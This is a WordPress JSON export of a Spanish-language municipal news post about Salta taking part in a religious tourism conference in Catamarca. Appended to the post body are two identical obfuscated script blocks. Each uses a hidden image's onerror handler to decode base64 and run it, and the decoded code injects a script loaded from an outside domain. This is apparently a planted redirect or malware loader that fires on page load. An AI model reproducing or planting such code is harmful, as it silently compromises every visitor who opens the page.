{"id":1755,"date":"2022-11-08T21:30:40","date_gmt":"2022-11-09T00:30:40","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=1755"},"modified":"2025-08-14T00:30:46","modified_gmt":"2025-08-14T03:30:46","slug":"el-municipio-de-salta-participa-en-catamarca-del-15-encuentro-argentino-de-turismo-religioso","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=1755","title":{"rendered":"El municipio de Salta participa en Catamarca del\u00a015\u00b0 Encuentro Argentino de\u00a0Turismo Religioso"},"content":{"rendered":"\n<h4 class=\"has-white-color has-text-color has-background wp-block-heading\" style=\"background-color:#664d02\"><strong><em>En calidad de disertante, los representantes capitalinos expondr\u00e1n sobre\u00a0\u201cCapitales del Norte Argentino y el Patrimonio como pol\u00edtica de estado: An\u00e1lisis del caso Complejo Cultural\u00a0San\u00a0Francisco\u201d.<\/em><\/strong><\/h4>\n\n\n\n<p>La Municipalidad de Salta, a trav\u00e9s de la Secretar\u00eda de Cultura y Turismo, participar\u00e1&nbsp;en el 15\u00b0 Encuentro Argentino de&nbsp;Turismo Religioso, los d\u00edas 10 y 11 de noviembre, a realizarse en la ciudad de San Fernando del Valle de&nbsp;Catamarca.<\/p>\n\n\n\n<p>El encuentro tiene por objetivos el rescate de valores, las alianzas y destacar el concepto de la espiritualidad en lo&nbsp;hist\u00f3rico,&nbsp;cultural&nbsp;y religioso.<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"alignright size-large is-resized\"><img fetchpriority=\"high\" decoding=\"async\" src=\"https:\/\/prensa.municipalidadsalta.gob.ar\/wp-content\/uploads\/2022\/11\/turismo-religioso-flyer.jpeg\" alt=\"\" width=\"431\" height=\"431\"\/><\/figure><\/div>\n\n\n<p>Tambi\u00e9n&nbsp;se plantea exponer&nbsp;la visi\u00f3n estrat\u00e9gica de los municipios, para cuidar y gestionar una planificaci\u00f3n estrat\u00e9gica&nbsp;en lo religioso con el&nbsp;rescate del&nbsp;patrimonio arquitect\u00f3nico que los&nbsp;cl\u00e9rigos&nbsp;no pueden sostener y la construcci\u00f3n de rutas tur\u00edsticas&nbsp;religiosas como&nbsp; es&nbsp;el caso de las capitales del norte que se encuentran trabajando en la figura de San Francisco Solano ,entre otros temas.<\/p>\n\n\n\n<p>La ciudad de Salta tendr\u00e1 la ponencia sobre&nbsp;Capitales del Norte Argentino y el Patrimonio como pol\u00edtica de estado:&nbsp;Planificaci\u00f3n hist\u00f3rica patrimonial, an\u00e1lisis del caso: Complejo Cultural&nbsp;San&nbsp;Francisco.<\/p>\n\n\n\n<p>\u00abEste tipo de encuentros demuestran la importancia del turismo religioso para nuestras ciudades, en especial para las ciudades capitales, que somos las que albergamos una gran cantidad de edificios religiosos monumentales de nuestro pa\u00eds. Hay un compromiso para trabajarlo de manera seria y responsable para que no se altere la religiosidad y las cuestiones de fe. El turismo religioso es uno de los motivos por el cual el destino Salta es reconocido: &nbsp;desde la religiosidad, arquitectura, el cuidado patrimonial y sobre todo por el acervo cultural de nuestra ciudad\u00bb afirm\u00f3 la subsecretaria de Gesti\u00f3n, Emilia San\u00edn.<\/p>\n\n\n\n<p>Por su parte, la secretaria de Turismo y Desarrollo Econ\u00f3mico de la ciudad organizadora, In\u00e9s Galindez, explic\u00f3 sobre el temario \u00abser\u00e1 amplio y diverso, por ejemplo las festividades del Milagro en Salta, de Luj\u00e1n en Buenos Aires, de la Virgen del Valle en Catamarca. Se har\u00e1 un an\u00e1lisis sobre el impacto masivo de turistas en cada lugar desde la mirada de un especialista en urbanismos. Habr\u00e1 disertantes de la parte p\u00fablica, privada, emprendedores investigadores, docentes, historiadores, entre otros\u00bb<\/p>\n\n\n\n<p>La funcionaria catamarque\u00f1a remarc\u00f3 tambi\u00e9n que \u00abnuestro inter\u00e9s en armar rutas tur\u00edsticas religiosas o espirituales como la de Santiago de Compostela, entre las ciudades del norte, poder trabajarlo con las agencias, con respeto y el acompa\u00f1amiento de los cultos mostrando tambi\u00e9n los procesos de evangelizaci\u00f3n. Los esperamos a todos\u00bb<\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>En calidad de disertante, los representantes capitalinos expondr\u00e1n sobre\u00a0\u201cCapitales del Norte Argentino y el Patrimonio como pol\u00edtica de estado: An\u00e1lisis del caso Complejo Cultural\u00a0San\u00a0Francisco\u201d. La Municipalidad de Salta, a trav\u00e9s de la Secretar\u00eda de Cultura y Turismo, participar\u00e1&nbsp;en el 15\u00b0 Encuentro Argentino de&nbsp;Turismo Religioso, los d\u00edas 10 y 11 de noviembre, a realizarse en la [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":1756,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[2],"tags":[],"class_list":{"0":"post-1755","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-religiosos"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1755"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=1755"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1755\/revisions"}],"predecessor-version":[{"id":7283,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1755\/revisions\/7283"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/1756"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=1755"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=1755"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=1755"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}